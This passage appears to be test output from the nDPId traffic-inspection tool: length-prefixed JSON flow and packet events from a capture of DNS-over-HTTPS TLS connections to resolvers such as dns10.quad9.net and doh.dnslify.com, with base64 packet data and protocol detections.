SEzXoXSN2X+GKzFZl0S1\/cEXQGO2yVQzWkPUMhh0gTbASy1MtoPkBs1VLmccZG6VMIanE\/Pd1\/AmN+44wbWDJ+AcIisgRr14kHkecxeo6qEPvRckWi1Y+MB43PdM38kIUuB4ny7fwppqpmv8DILGQ0779kEvzfVRiZrCYvFXu\/QOSUdvmxjdD6cpAlFDWsPq2Pc93te5jeGVaL0ejtHRLIxI7z\/Q501zSpx\/Cya9ypg5U1NAxSXKe10YJjCTWrmOYKmnYerWRan08XbdkvYLJUzjKsspm7dhtxg0E1f4GsSbQFVWwrs\/ZM+C5sBOiJWUOh2pogAFGGsfjjO9vzloRUIbA2Ux9PdhnCAwgsxjwIpMB0l+UdFEMsbPJQhlOxGEwe2dnsCm5A+xtqvz5mH9nbAz2uU5hDs7xBrPc+8iDApG3YcmB6tDQMRmVl4wND49H4\/Hb2EGewuCKV1\/lze0iB9RIgI9rfK\/5kPRVAptvZ2+Rek\/4ghlbEG+l+OpOmeFXbOF8BuB9O0sPArzn0gERY+1PqlX8USIY4KAapC8vGnRNqePUVgog6kgSCom8jkuyrzOHCdEM1CnPySLw7a\/tPZxODv2GVX+BkBTvdcEhFOjQ1TZSMjExVd8xloEm8\/FJ6+H0jkz8IvfKaJAX48951TiRuA57Va3CSiHx+djtV0dMa0UJnQcAEaubJWYUsRu7sYXVg8tQm7wgM9eerw0ql07SNc\/dHQUxeGfY6HDVaN4jlbWxp48tTf5vFa+VilGPTo45486GBOKU+5wyUckgVnRpF60eC3RcISu3IMve+0In4k9R88DIjvwS1SST04NZPv7f41CsbwoBIpKZKJAFU+NplzdS0BOyBcGgjEAzzOtpFJ7jXjBK8x1DEPVeN6HSSbNaiOV7VevW0oBjFRBvVLEmxy48HjBSY3QWjS+yqFN8Qy4bledb1fb4GI3oWPT+BRcDAwEZfpmEI\/d7cy4YyqdnKDwIn\/k3qXWNAj2sXjRKguMhqhlkOdUvzFkzzM0xeuvfwnq6QSn3NpKskeWNBR8K+ECaE3mhCxghdnhLIum9rgOMvkgnfyBTDAfYKNN\/d62vQY6u4rbxXpDQk04FVnBPxSfPHXuC+oF8kMOU1++DK+ZoETlcuLrk2BRjjMQpK7pf+k1VI6pVnOclLhCXYHQjMUHZufh3HVG3mM7BF+lzB0K07EInEh+Ccp7LdqMGfKnUNXPWyokhcE9BzZJT2yWb8DylKWRWvZNetxzugclU9IhwHPPfcLEVBg0Fudoqm9ZGps0h7H+c6XIpsbql70txNRPE+wXofhHvkqNoGKLp9YrmmnKta0xlevWHOwMXAwMARTi1\/bQ1JQowGKIWBX\/iwQMAp\/a2d7gVFXnQQSu7gEMDkgFlDNq8l9T+VqanQcvXHm8wx\/TYqk2+tBPvp+6SO7GVVfwN5A=="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":946739603327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739603327,"pkt":"REREREREZmZmZmZmCABFAAFFXkZAAKYGop0KAAABCQkJCsqGAbs6mTvywXrNXlAYAfbUBgAAFgMBARgBAAEUAwPEiPyvZDyiU8chFqn7v3nOV\/W\/daCFgBrWvLyeLgdOBSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHngAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIELSbbeQ+1Z\/PGkzWYpOrrGvdC\/XSIyiiMDimHGqOwN9"}
00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":946739603346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3068,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3068,"pkt_l4_len":3034,"thread_ts_msec":946739603346,"pkt":"ZmZmZmZmRERERERECABFAAvuVbVAADsGC4YJCQkKCgAAAQG7yobBes1eOpk9D1AYAHferwAAFgMDAHoCAAB2AwPPxPF58rRx8NlAStddGtWmBxk0TsgFRMyjmLE2UJLzOSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHnhMCAAAuACsAAgMEADMAJAAdACAXimL6oC2BgKKkKv2GFQZ0YvKv9UBLIqQLjYesKsDOXxQDAwABARcDAwAgsv\/aMwoaVLJwBsdUrBspRDIe6WOUfDjyPvz9+wtEYK8XAwMKaJbt\/ye5NqlSM6\/tOfe9bC5ygGHuvTHGsEkug50mliwDXC+zbimuaXpevBCVc6v4emlocpuYSolXpHjPLZ5mH\/n\/Wwg\/zT8DKTys1phOBjndqMIJ26DAd1BULzfsS4\/LPzxUrBzIWvX6A2LKLmwvvolWTixlKxXTGAwoKmNpvOmmolp5p0KnP+05uqYpZwQr1eiVG4Jbxo4RKPp2m5qudj526IfaIUxv6TymwnkyKidb8KJ7fECEEmqDTEJYi3AMqq0F6jVWm4S\/Cw3xWxFHQLXfbhWl\/xQNbH7sQr1+VP1aT1KVnkPOnmrjsvXKtU37nhtNVagiwB4tTsa0XjgxO6nNrduMisjiP1kYOcjiQ52IvQ8yUcLxoVZvs66brT2XF4X+BUOjv0f2D+iKuSPPaodKDokIKfB3EFHwrxtXROObndCkt2l8uoO\/YFwn4AVaivPS7QA9y1ZB5oLifA+q5b\/fsbKJUohIzT23SgYvI1FZi9km+tWoalj+0eMzm2XcwysPa97vGSKpeXtbzhnBE6t0DL+SCNAkdyN9iZf+SkkYuc1rpy8H6FsnB0MNHcLT\/7h9UpysD4zCa5uCyld0qhDdV3MzU7a7heBLLZvpkeoMCMY0KW7Nghl3Tf2jMPhPpMXgWhDsiEqTDOOStqJ6ji5D3nXcz67NA7onASlOfxCYNM8r0u017+zZIe1OE+PpBYW8chi30ujo48vE+6Zr1LXdzMZq7SQ9KcvNds70bZNXXOxSMjMXLVZIXnbsRiW02iiUe4S1V8qA1xoY+tL3PM\/3KBP4ZSUn0i9oU0Zm0bhbtwOS\/9R3KZPgmCI+1g7zZ+sqsIKC0g2uvkEsdNIqhrXU224qW6xxP\/j7fBBrVPw5fuLCU7p8+Yh1Cpxk4zFmUhl0XbcAlqLu7rHI4fQoDUdIgemBLeSEl1+Y\/z6KYsqD8NYrgKAvSsbZ1H\/Vdb3V1ajFVEUtmvJbvjf\/83uaxbTgecYPCPp7fDTlwk8SSHepVo8KtWsduLEs3DxEjvauvr9rL7FbVuDjSA3SeEqhFhGtSYJioWjgprG3WdpQzYP52GvnOKwXu7vjaJad3BS\/DxKTEtPTMDE4Fp6cDirnN3wrVazuNyc6gO+xpNalCZ8Rd4w5DmHczo4DwVyfZ9Fxz7k2fB4TnNz9ILT10qjnOlN\/ksy+JVVDJTTX6v+Ua3SCh6Bynhcuz7SktArn4gMoxcY2E4z4hIcGQHNkb+py02aK7EHGVgPR74HZosi0lhtUl4dpwbcfDHkQU+oVloy53x1IxuauA66S2qPneNDmRr8rKf9GU\/LJH2dezQ+WudmVZtgHXrLWtjuFmnH7eaBODVb8UwsA0Ge9wdJPfbyaGd7iLOv94vz10GXsEVy\/CXkZZhekrbvjToLvfDqaRAilCzMBHwybWhwwRUQsUh\/rPF7FXEJaXHA+eAZPWEuEetxByN3cFbJKFAiJ4IoKIRBIkGZxaTOcLn\/+XdFg3+W\/lMlmaqOUp903NihM97Rw4Bpqxex1vlYSLEh1ll9uJAf5iJVYMcmiqcaYXWfQOEXWR1wEE7wZE1+wo9+np3wP\/ty0jb3vy8+oqDWA8OdUjkdhqeUyfjZfa6t7pr4ITQpHLy0bNHsZ48wim0yu3Y7a6artue3kmQYcW2RckDOWxjAYg9ikO\/kwS062tZFHnT2VanvAd16qor00inyMS9VT8p\/085mt8kQkGSG0rip8q4xWZYbMFCfcEVkD4E5q7utpFEDkZ964uRE2Vw1PzBHn62rcmtvUqQaoGAFjFlHLMS40f9r+HKG7wRWTWQ29d16NsH+Xu0qXRhzWgjImijKWlv6KBGT1Cxynn\/KrehvF0361FyBUkJo1S1Ztxsubdf3ddeGeEr99d5oc\/xgpXMAl6ZIfUBPJjnOeC932\/TOOjMzG7PhOgunB+ggqQ5LQc0CX3c5BLlJtBtobycDsl7t\/eLrX\/bMfWq1dBy8SxYnEvGbNHrForDiuOA\/0lI3GVO62V5P1dM2BK8fdHneO0FhK969xszY4KacAP0CD5Aah0NJ2dzSGVZQtRmv\/TuFZlUQB3cFfHJYpNMU\/sn32bfB7GWJI2MhPEITiLal7HIPxgTikeJcDL13qUn7bk19T+rXcadCGiBoKDb40Dx6ogDfm4H0pA9C7OZJC0LRf01KZZRBjQs4x5ewT+p6+Og3SFrrTJ8ObJe\/TFocDQSMCBCWHQJqFicRtnWl4mmw+qTCsSoZQ\/ibkZFi+igS4TWV+31tPjazydJfOrW9xLZSgCilkMeJWYl8vH1ijLI+xCM8xxlQj5svlwHqvt+EkteECF3EKEt55AWpnRTNzzJivCSHy2gGPxW5UKKBkiSUoPFh0qyVjKN5HqDcW5MrFR2HpLqhuRbEXoannFiepiMp6aCVRMgYzvmQIyFH17\/3pokulHalnqX0gFQkjPqUPYf6B8\/o0H5LL0kahUiyL+d6BqSr8d42vsjYrpSfDaIcCW+FFGcj\/61Y6Fdihg57b1nq47mVWBJ9vcfq6xagmjwoJrNbwHaDS0XVSxL6y45zWrDfovrm0VvelVEdjwsn0FcoL6zZxDjjOt0EJP+OSVXcMeuY7uIG+KTnnHoV0vMvgMsIMiJbtYXgvda9zrqGty0FDqsOWmIdUCMf7t9LcgXTVP1POJeyDb0J4B38BTX3wUkWV7Ddf9ih9u7A\/m95uqIUbBJE2UeEbEEHif0BvcJl8E3UGeXVNiKRj7lxmplRVER7ystoW7OIAwNXC3MbNiwrjMNGlyZxeIZvGJIjHlQuApwLZsjzZzABT3\/zDbS43YjZzqyO21cEI3xf5DfWK6ZyU3Gjytb2PX5Te\/wOkKfusuGJNyYU73DNCw6\/IA2qWOmaw7\/mXzErXE2WxarQFcAU6el9VnuyWPJs57xlszen8XWYD0zQcAkiZ9pBOymEDFngWCP8+c+AEG42RtW8heXsNn6Oe2ZAWO\/0AXBzQr+rO1qlWDZzv3V7XELPKS49M71P\/6XXdYRKeCeHIn9vIc91j0OnL7GZzEPRVrpELGmw5rN7x6AqDoK3g\/LGcF47Fu59pwNqH3h40OLoshBk76izruGCqusL4Ms6YFarwUJkiUBlvhjjR7yHu721yX53PmlJXwCPueaRMxPhyJUl4AErQ3xPn5KAYXOjk3\/LnBLmSDl4f8PDkxmKUVaitsKqWvpl1TTX0fA2ZAqmTFey5ifEjBKLesy4caeyeCMEZZjMOhPX9MKfIEGous6lHCaZSQQHUSMY1BTylXmW622\/10lQS8aN1mce++r7\/TAswiTbum59NRH+1WXDpTaq5aRBgs7Pc6pr4lABNwxmieRHx0ER8V5gmxNVB9ACpzjEkp28DmYAH1\/iiBQfjkW2oblAVhUqcezWZUUEbpTbTAEj81Dzg+Fe2EsJFV2MiLhqH0ZMEkKY9oMnGyGvqY11wK7Qf4HXmtakoM3CF+wPbb9he7ffoRbYXCwbxTcDrBSEJdjOMhsSClbW03C9LGM4s6RAprMpnuw2wArtlzcr4bo701pOupS\/tdL5NkaZ2ZzsCChcDAwBgOnNpVcvc5YFZ3YuA8YRoqsuLDn4GImAnVqFIX3IzoTnZe29KOqUXQC0V61jJdr5Jnb3k3MOCdTH2u+HBBkKmYvlFb8GpDbcgObm2pFs9vNSY1WNyfnlLuFSQCBkHWe0UFwMDAEV7D2ZJm3CG6uFedmkozBwacoDrnHkQN6RCxC8K2l8lcKCSu3Q0j3XFRWsykB64fgtOqxtlPlxXpmtKrFqiyWDCeX9Q+Jw="}
00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739603327,"flow_last_seen":946739603346,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":3299,"flow_avg_l4_payload_len":1649,"midstream":1,"thread_ts_msec":946739603346,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":946739603374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739603374,"pkt":"REREREREZmZmZmZmCABFAAB4XkhAAKYGo2gKAAABCQkJCsqGAbs6mT0PwXrZJFAYAfXTOQAAFAMDAAEBFwMDAEXJf2y8xWhMhAZA2WXz9agwI9f91RKP49sWLlsKAqD2Anz18+mnUXeRrd7MefwrF\/wulkzvUzp\/PNHsE\/j94eCMWT0CzeI="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":946739661512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739661512,"pkt":"REREREREZmZmZmZmCABFAAFFx6JAAK8GN2cKAAABuetRAa6gAbuz5lknlG0\/21AYAfbM4AAAFgMBARgBAAEUAwMfgFJ2Kafn6OC8bsQNsKFbNXsDyxgypaGgbuYoVgNdqiAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIIH2RRfX3PNaXYMOoXj3ynNGqfHChI6\/gAXerDGvzggi"}
00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":946739661535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739661535,"pkt":"ZmZmZmZmRERERERECABFAAxS7o9AADQGgG2561EBCgAAAQG7rqCUbT\/bs+ZaRFAYA+rX7QAAFgMDAHoCAAB2AwOIv9853ekbZoNmLmgcqNPyyS1j9KmZm6LL1EB3x+W+MyAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3BMCAAAuACsAAgMEADMAJAAdACD6x6OWYowjGpQ7hpL1\/XAvKAPz7Qey4KV7v02zhqXZdBQDAwABARcDAwAgyc0HM+W8H8TE3DEJWTZrLIbavzRZjtX85L8RdcWlDvUXAwMKE3Ep4ySuvwn1mgGngq567huqNt4kq0krhrI\/h93Xu5m86O9X2PLgikjAQ\/f9b0D4TlJnxV9cGU04GfVlCuVdBuDl1OIowNDzv97yB1hnS\/nmnSeVxy1F8D7\/C2lvCqf2cxAVE09ueyG1Z8bXZ2QECTYKbWaJhHhH3grXMLxM9TK7dwfYp5ry3mgBLj8Im1sBBtK1ijR5DOPlXD4i38GWBdXuEFX66BB\/RJoRwVEIncNbQelSZeCqjUb3u++TUwMNQylDBUpnEAe47WxBvCiB3j4t00aQSmqM0TAluU8dwn7tiUiJEwAYZgDG8XeCA2d8CwkyaaNUs0P3Rp5Ub77dFKLlWkM7Ox84gnAyRhVMHCmMumYMkWKlAivuj\/eXgWwWByB6smKGxdGHvMorcYTbQq9mZYmNNNkDPDaVaw5533PFvpx4ba99q1b36RpLWXBUvp3e8mh0pBow5UcR930tP8k9y3Mp\/Hul\/USMW6fOtKvrODulyByiQtZSjqe6z4\/9jz9br68\/R0pBmxYIdiwDh9sAHDejB9VSYvk7ssbBQpn+Jgwnz6Ryy+sDgPoInVRafSLVQ2XaqYm5f6C0Jwzhr6UtNZ4\/zNTcpzOWnfrCB0SA4OuUkh\/XzE\/16DFk8ZQDliBoueyPhn8cEizoLe43IQ4BRx1FGhFopJsvL2cINLJIZh8DTM\/8W7f\/ASccXTbKN3NreGL2zPJ9HkyArzmAuS0H6AWBUpZyjU0X4LPypLaoIp74s3Z6LMGrDv+Q9HPcSM3AsvYaPpVMikXZgrncjZjmSO3nKjVK7tuPHzmBxV2ASbUY9dkYy7qS1LbwD5HCaZkMJLquTC43\/zrZa9Cf+VJlQO+7\/bTkI19jV7MBsNxvCJS3vho32OcNSgskst5WCDisQYxOEJ7yIiJ4Qj131r3komITCdIi6sfPNECBD925ao9iSOw1a3NghVbKi1Ke9+osy6p4OIfl7R\/jJIRkFpjTHB9lrhuKyd3x90HahF\/Bgrc+0OPDW3df50BV25QUTv0YHg583iZZwuimhgpeeN8oRbZn4Oz1sb61wMILMVA1YkIFgELm6QWH0EjBDa5PcdPXwcXSRAXJR2\/zX8giHU9oVoqfNaIjA+SmyaolS9o0C9Gxx9xhkTFg+SAbN3Goh5osUJrTzgif84rF3v\/clkf8\/ZhPyDROa9H0yWh+TK3VY9NLRXxv12lS5FZMqutTNAtmppSaz1n5imbXVp1Da9\/rGuGJgyHbUPRjpcY\/qQ4nrdYPUt0lBpjbxywR21B5bH94VrAutoZgT1NlpA1fjy8uX6CC\/PzzpWgwoLz2\/ah06JLAEuj5ndY\/3P\/Cea86JZSQRIAOkxHfXLLrlrueGx1dvDahl9VAk02WVblMiy86oo72YX2jdNNf7IRMOaPtI08s6slCfPDpn3bANNyLKCX6T8oskMhdiK\/HIjCb1KyAdgQ2+yLvi3d+MuMeWmC07amcrbn+OTYQQNPWx6i\/o5VJfAp896EdOSd0n7JnPYzTA1M2RyiA5D2thGuZ18x5oW4andkKefpZLKocbhraKqdRDR2qHe1UOjP7ac97YdAdmgxzkuJnD41fZ8SEi5Zg3NfdmEEfpkvRjC5orTLd0fIsx5c1+XLU\/R3b4bQM96DkiRuZJ1NUlIhf9JvTA7QhsNS9Evhm+KxSrzo4fPncRHMt8lm5+VkFq5jZsS\/4aS9tmtMGO7fcr\/LpSveCPtAloCQrU+vhpaXaC4\/SCuRji5PdK182R618OsLro46yH5FqoSw3EFuupxW4KHdDcJyAmbvTP3RLz1SxCnflYoAqTczyrDRGBg9\/VwVoEVI1F90s2UJwdF3wAnZAvtsFo0aX7P\/QLLigT0+21EtehOsx99nALYpQP+Wes4pdBUuuM1hrGs4phO3GFIyYVSCdORl3bwKcDgUn6jxeA5jLALqAkUQz6oQZAw+UAmaFT7liB5ZMHspe2Nk5qb3bDaj1FmXHIWt\/85M5M02qebtth3yNCkr6Yp8QH7DkvUBEcBvugZfGdO8uohym\/eNU58r4tZ+dX\/tuHtfYu\/HTthyF6zJIA5NCwZI8ZPOa0Ik2ZVHuDdccBZzRFIr6iS6N658h5UD2w34\/Zc25OfWHIIyNU8f8\/IYCk9XVJNve0Okk42KtkEZEvU5b0G1QgC8PnK8r+XSR+vGYlx30IHhP0Drstay6UqCpdjb38zyt16Qx9KI1K78\/2x0ZLR7g9lNe5aJSm2DGdBsBLk1r5a74FD95UK8Adgld6WS3J1isO2nKe9Xs1y3yG0BHL6PVzcVJ6xLZkhyj81HERDbvsw89dCQ0RJq5YmEae+boIDnKyAnLYzUgmbMRlc1g8JOgQmr6\/NRcNQVzPj9Tmr7h+4nauDzZ0EwSB6bpnhekE6zTzsN8ksFy6WPV1V2TWaFMCxIJpm4tqxJloTCvFyT3CBtW57hPqqD33WSzMFQ4mYuH5Kgu\/JydyuTxbX33iR4YxYd7QhqiqEqf7Z40jPc99ZwAIj52PTzQ7U+ojkqP4MuUynWiVDvS\/8M2\/Vvth6PA4ClC+NG9V0jqT2CwEy0LU0ERe0qEd656+zZx\/fgC3xfIuWV0svyqgeH7U8anrlDCpp7N40O2SWqb3L3JMSf4o49g5Y7jySS1fW2+m5VjaQqCccoq+\/wn0QIhjH7Xd2oER1gcyADsjGJt5aqBudWst9NAdC7\/E6mgwXOhZmtXb1lcPmN1A3ldDXRkgXTncFzTkiGIgqqygowkLd1h\/u0K8p6hXN6SporJbwLrTenWrNDIG63gFBLm2D7U+S642eghPumVgo7B1N6elGvUpSDX3m8qB6zRisoSKoWKWO5xgUo0OWMndotDAaZPAq3bhL2Pxzdl9WOKnnP6NOK4+F4BC3OgZgYIEUhrknbM3wBtdHfsfGuj0RFj5lNw2AlFe8pNBDRkjYdmUdc0f\/vnWwnfo22NWKX1BdiVu7196lmWb3TQ4gFhlK81yNy7eFJuFbgrYZ5PUlfjIwTDgxIXshraxns8270zwqor2u3QZYQoN4I1EUcEja7lh2qdAWxfca\/zxpKtNeCFUm8zfvAy2hjwmAqVnw7n4Et+Xyf9ksFEQ4\/qzsOHpBM0zGs5xxH5dXSgC84hPug8TuHm5XeS02QK5ivwcMFrRGIBts0M6ytr6tm6t5af5Z2U58e0QlvyTSXCPiJUK3gUQUYViS\/IjXLR2ycg4306mXwXdbQ8v7MG8Jbo+42mtOwsAND+01bl1fOhl5IjO\/hKWjGNBJndlQaRfYzoY1bNcjrUVpsWniWOjJBYJ9yapHVp6DQ0QxTAp4enh41yjjXkuC9cO0IfBYAr0q3doev3F6MDmfD3QC30o0nnTuJKglBmQmNqmFF98Ioa6LYtVQSVj9fT7Jq0Jj7\/w6McuInFQUSdd3NIs7zDF4f1McMigXXd3svv1byyFwMDARmEZ3FvSkJXAws42ybGrYb\/Ga9WUTit+emudCQdO3qxSLRL9Xz90Zj\/0AIfatwlfnnVgLFc5QxTIdMvpyCnIjSAcDaEJvu6yM03S3K45PurYyNI6VNrD8T3C7JZ2oGRKr9xNDuiMdmtC9\/9YGpIp8JcXSnnpIql+dalqpwG9n50trcQI0C4J+hm1Yu6USN4wzVC+tr3gsW6PyyDAAs17vVbo+Scs5p00FZ1o\/rHfMtLfFwh8MAYWoGvtptGh9N2zS+PrJ1tBcSPIWnstLtsnAnrYxfC9FGgvCH\/DigiWfhGZwyoa504FzWxS6CzOvDPhsC522yXw\/\/MDJuJbpdH1g+oBnB701N1aymW+zBchXMoA1YOfcUScPREsxcDAwBF82UTEIbXenVn7eF73krbJp8pjxkB3FH+h3306Rr5JIHM3AbirkPdWnHupm94YxIhIDqYUbC9YcWD3w0dLlmwNJiAVT\/+"}
00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739661512,"flow_last_seen":946739661535,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739661535,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":946739661537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739661537,"pkt":"REREREREZmZmZmZmCABFAAB4x6RAAK8GODIKAAABuetRAa6gAbuz5lpElG1MBVAYAfXMEwAAFAMDAAEBFwMDAEU4SkGRhTVOzjkja1xO2w+N\/vz+OkRmcdhLqaqpXQNb6A6SRcM4Xi9F7CyJ7zWjY541e0wZEZOfbwCMOI4VGHKGlHVB\/Ow="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
